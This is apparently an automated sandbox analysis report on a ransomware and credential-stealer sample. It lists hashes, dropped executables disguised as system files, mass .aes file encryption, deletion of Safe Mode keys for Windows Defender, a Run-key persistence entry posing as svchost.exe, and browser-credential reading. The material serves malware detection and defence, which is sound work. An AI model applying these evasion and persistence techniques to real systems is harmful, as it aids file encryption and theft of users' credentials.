5015af8fb5725c4c9ebac28a890128587b888acddab6cc9ff06e94e782713882

Analysis

max time kernel
298s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22-11-2024 03:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sys100s.exe_.exe
Size

506KB
MD5

d06f3948aec51684a26a75dbe9dcd581
SHA1

af72af7676e74cc4c4b8e67c43f005c850e60267
SHA256

59ed7a26c56a644bf3f5ba45459965be8a6e6b79dcf4f90a5c51f2bb12190bf9
SHA512

4b7f50932aadefcb5b3e50ed5aed24eca8e39c5202d748ad77fe7774e269be030b12485c4e1d31028b87a9632c22930daee8115d5a1793b878d0823fe1eb87f5
SSDEEP

12288:Y3nZMhJ+ubNJVwlQjf1X6PwKU3sk1BLJuUlTopsNSwIWZ4IN:Y3nZqfbvGmjdXgwK891BLQsosSWZbN

Score

9^/10

defense_evasion discovery persistence ransomware spyware stealer

Malware Config

Signatures

Renames multiple (1213) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Executes dropped EXE 64 IoCs

Processes:

dcomcnfgui.exeucsvcsh.exedcomcnfgui.exeucsvcsh.exedcomcnfgui.exeucsvcsh.exeucsvcsh.exedcomcnfgui.exedcomcnfgui.exeucsvcsh.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exe

pid	process
1188	dcomcnfgui.exe
536	ucsvcsh.exe
1032	dcomcnfgui.exe
1880	ucsvcsh.exe
2396	dcomcnfgui.exe
1052	ucsvcsh.exe
1224	ucsvcsh.exe
2412	dcomcnfgui.exe
892	dcomcnfgui.exe
1804	ucsvcsh.exe
1592	aescrypter.exe
2308	aescrypter.exe
1580	aescrypter.exe
1900	aescrypter.exe
2856	aescrypter.exe
3068	aescrypter.exe
2200	aescrypter.exe
2892	aescrypter.exe
2360	aescrypter.exe
776	aescrypter.exe
2940	aescrypter.exe
2980	aescrypter.exe
1380	aescrypter.exe
2836	aescrypter.exe
2932	aescrypter.exe
1972	aescrypter.exe
1728	aescrypter.exe
2344	aescrypter.exe
1664	aescrypter.exe
1964	aescrypter.exe
3036	aescrypter.exe
2140	aescrypter.exe
2520	aescrypter.exe
2060	aescrypter.exe
1040	aescrypter.exe
1712	aescrypter.exe
1140	aescrypter.exe
1816	aescrypter.exe
1672	aescrypter.exe
1540	aescrypter.exe
684	aescrypter.exe
2496	aescrypter.exe
1192	aescrypter.exe
1552	aescrypter.exe
2020	aescrypter.exe
2136	aescrypter.exe
1756	aescrypter.exe
1644	aescrypter.exe
2688	aescrypter.exe
2104	aescrypter.exe
2312	aescrypter.exe
2756	aescrypter.exe
2872	aescrypter.exe
2856	aescrypter.exe
3068	aescrypter.exe
2656	aescrypter.exe
2728	aescrypter.exe
2776	aescrypter.exe
1108	aescrypter.exe
2808	aescrypter.exe
1444	aescrypter.exe
2828	aescrypter.exe
2028	aescrypter.exe
1032	aescrypter.exe

Impair Defenses: Safe Mode Boot 1 TTPs 3 IoCs

defense_evasion

Safe Mode Boot

T1562.009

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend	reg.exe

Loads dropped DLL 51 IoCs

Processes:

sys100s.exe_.exedcomcnfgui.exe

pid	process
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
2412	dcomcnfgui.exe
2412	dcomcnfgui.exe
2412	dcomcnfgui.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe
580	sys100s.exe_.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

REG.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\local\\svchost.exe"	REG.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Drops file in System32 directory 15 IoCs

Processes:

sys100s.exe_.exedcomcnfgui.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\ucsvcsh.exe	sys100s.exe_.exe
File opened for modification	C:\Windows\SysWOW64\tcpsvcss.exe	sys100s.exe_.exe
File opened for modification	C:\Windows\SysWOW64\tracerpts.exe	sys100s.exe_.exe
File opened for modification	C:\Windows\SysWOW64\csrsstub.exe	sys100s.exe_.exe
File created	C:\Windows\SysWOW64\ucsvcsh.exe	sys100s.exe_.exe
File created	C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259465386	sys100s.exe_.exe
File created	C:\Windows\SysWOW64\__rar_0.800
File opened for modification	C:\Windows\SysWOW64\dcomcnfgui.exe	sys100s.exe_.exe
File created	C:\Windows\SysWOW64\tracerpts.exe	sys100s.exe_.exe
File created	C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259452984	sys100s.exe_.exe
File created	C:\Windows\SysWOW64\tcpsvcss.exe	sys100s.exe_.exe
File opened for modification	C:\Windows\SysWOW64\wcmtstcsys.sss	dcomcnfgui.exe
File created	C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259445559	sys100s.exe_.exe
File created	C:\Windows\SysWOW64\csrsstub.exe	sys100s.exe_.exe
File created	C:\Windows\SysWOW64\dcomcnfgui.exe	sys100s.exe_.exe

Drops file in Program Files directory 64 IoCs

Processes:

aescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG.aes	aescrypter.exe
File created	C:\Program Files\7-Zip\Lang\ps.txt.aes	aescrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp.aes	aescrypter.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mn.txt.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIconMask.bmp.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP.aes	aescrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.aes	aescrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml.aes	aescrypter.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp.aes	aescrypter.exe
File created	C:\Program Files\7-Zip\Lang\ja.txt.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGATNGET.XML.aes
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml.aes	aescrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\QP.XML.aes
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.HK.XML.aes
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG.aes	aescrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml.aes	aescrypter.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml.aes	aescrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.aes	aescrypter.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.aes	aescrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp.aes	aescrypter.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL027.XML.aes
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.TW.XML.aes
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BIZCARD.XML.aes
File opened for modification	C:\Program Files\7-Zip\Lang\ug.txt.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML.aes
File created	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML.aes
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OCRHC.DAT.aes
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\NL.ROGERS.COM.XML.aes
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT.aes	aescrypter.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.aes	aescrypter.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml.aes	aescrypter.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml.aes	aescrypter.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg.aes	aescrypter.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

aescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exePING.EXEaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exeaescrypter.exePING.EXEaescrypter.exeaescrypter.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aescrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 30 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
1572	PING.EXE
2676	PING.EXE
2512	PING.EXE
1612	PING.EXE
2740	PING.EXE
2268	PING.EXE
2592	PING.EXE
2884	PING.EXE
1920	PING.EXE
1204	PING.EXE
1664	PING.EXE
768	PING.EXE
2452	PING.EXE
2952	PING.EXE
2656	PING.EXE
1536	PING.EXE
2316	PING.EXE
2608	PING.EXE
2916	PING.EXE
828	PING.EXE
2624	PING.EXE
292	PING.EXE
768	PING.EXE
1612	PING.EXE
1964	PING.EXE
376	PING.EXE
760	PING.EXE
2912	PING.EXE
2880	PING.EXE
2672	PING.EXE

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1716 reg.exe

pid	process
1716	reg.exe

Runs ping.exe 1 TTPs 30 IoCs

Remote System Discovery

T1018

Processes:

pid	process
1536	PING.EXE
2512	PING.EXE
1964	PING.EXE
1612	PING.EXE
2592	PING.EXE
2952	PING.EXE
2912	PING.EXE
2884	PING.EXE
1612	PING.EXE
1920	PING.EXE
828	PING.EXE
2316	PING.EXE
2740	PING.EXE
2656	PING.EXE
1204	PING.EXE
2268	PING.EXE
2452	PING.EXE
768	PING.EXE
768	PING.EXE
2880	PING.EXE
2608	PING.EXE
760	PING.EXE
292	PING.EXE
2672	PING.EXE
2676	PING.EXE
2916	PING.EXE
1664	PING.EXE
376	PING.EXE
1572	PING.EXE
2624	PING.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

sys100s.exe_.exe

description	pid	process	target process
PID 580 wrote to memory of 1188	580	sys100s.exe_.exe	dcomcnfgui.exe
PID 580 wrote to memory of 1188	580	sys100s.exe_.exe	dcomcnfgui.exe
PID 580 wrote to memory of 1188	580	sys100s.exe_.exe	dcomcnfgui.exe
PID 580 wrote to memory of 1188	580	sys100s.exe_.exe	dcomcnfgui.exe
PID 580 wrote to memory of 1188	580	sys100s.exe_.exe	dcomcnfgui.exe
PID 580 wrote to memory of 1188	580	sys100s.exe_.exe	dcomcnfgui.exe
PID 580 wrote to memory of 1188	580	sys100s.exe_.exe	dcomcnfgui.exe
PID 580 wrote to memory of 536	580	sys100s.exe_.exe	ucsvcsh.exe
PID 580 wrote to memory of 536	580	sys100s.exe_.exe	ucsvcsh.exe
PID 580 wrote to memory of 536	580	sys100s.exe_.exe	ucsvcsh.exe
PID 580 wrote to memory of 536	580	sys100s.exe_.exe	ucsvcsh.exe
PID 580 wrote to memory of 536	580	sys100s.exe_.exe	ucsvcsh.exe
PID 580 wrote to memory of 536	580	sys100s.exe_.exe	ucsvcsh.exe
PID 580 wrote to memory of 536	580	sys100s.exe_.exe	ucsvcsh.exe
PID 580 wrote to memory of 2884	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2884	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2884	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2884	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2884	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2884	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2884	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2740	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2740	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2740	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2740	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2740	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2740	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2740	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2952	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2952	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2952	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2952	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2952	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2952	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2952	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2880	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2880	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2880	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2880	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2880	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2880	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2880	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2656	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2656	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2656	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2656	580	sys100s.exe_.exe	PING.EXE
PID 580 wrote to memory of 2656	580	sys100s.exe_.exe	PING.EXE
